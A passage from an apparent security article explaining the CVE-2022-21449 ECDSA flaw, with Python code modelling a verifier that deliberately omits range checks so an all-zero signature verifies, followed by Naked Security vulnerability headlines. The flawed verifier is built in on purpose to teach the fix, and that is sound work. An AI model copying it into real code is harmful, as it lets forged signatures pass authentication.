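    return R is not None and R[0] % N == r

def verify_unchecked(q: Point, msg: bytes, sig: Tuple[int, int]) -> bool:
    """Model of the CVE-2022-21449 mistake (an assumption about its effect, not Oracle's code):
    no range check, the 'inverse' of 0 taken as 0, and the point at infinity read as x = 0.
    With r = s = 0 both scalars vanish, R is the identity, 0 == 0, and the signature 'verifies'."""
    r, s = sig
    e = hash_to_int(msg)
    w = pow(s, -1, N) if s % N else 0
    R = add(mul(e * w % N, G), mul(r * w % N, q))
    x = 0 if R is None else R[0]
    return x % N == r % N

if __name__ == "__main__":
    d = 0xC9AFA9D845BA75166B5C215767B1D6934E50C3DB36E89B127B8A622B120F6721   # test-only private key
    q = mul(d, G)
    sig = sign(d, b"sample")
    print("genuine signature:  checked =", verify(q, b"sample", sig), " unchecked =", verify_unchecked(q, b"sample", sig))
    print("all-zero signature: checked =", verify(q, b"sample", (0, 0)), " unchecked =", verify_unchecked(q, b"sample", (0, 0)))
```

The lesson generalises beyond Java: any verifier, for any signature scheme, has to validate that the values it is handed are in the domain the mathematics assumes before it starts computing with them, and that check belongs in the verifier itself rather than in whatever parses the signature encoding.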
Yet another Chrome zero-day emergency update – patch now!
April 16th, 2022 at 00:33
By Paul Ducklin
The third emergency Chrome 0-day in three months - the first one was exploited by North Korea, so you might as well get this one ASAP.
Related tags: Google, Google Chrome, Microsoft Edge, Vulnerability, "Edge", browser, chrome, CVE-2022-1364, type confusion, vulnerability

Two different “VMware Spring” bugs at large – we cut through the confusion
March 31st, 2022 at 16:59
By Paul Ducklin
Whoever came up with the name "Spring4Shell" didn't help at all... we cut through the Spring Bug confusion
Related tags: CVE-2022-22963, CVE-2022-22965, Spring, Spring Cloud, Spring Framework, Spring4Shell, VMWare Spring

“VMware Spring Cloud Function” Java bug gives instant remote code execution – update now!
March 30th, 2022 at 20:38
By Paul Ducklin
Easy unauthenticated remote code execution - PoC code already out
Related tags: Uncategorized, CVE-2022-22963, Java, Log4Shell, SPEL, Spring, Spring Cloud, Spring Expression, Resource

Zlib data compressor fixes 17-year-old security bug – patch, errrm, now
March 29th, 2022 at 16:37
By Paul Ducklin
This code is venerable! Surely all the bugs must be out by now?
Related tags: Vulnerability, CVE-2018-25032, DEFLATE, ormandy, vulnerability, Zlib

Google Chrome patches mysterious new zero-day bug – update now
March 28th, 2022 at 14:18
By Paul Ducklin
CVE-2022-1096 - another mystery in-the-wild 0-day in Chrome... check your version now!
Related tags: Google, Google Chrome, chrome, Chromium, CVE-2022-1096, Exploit, Zero Day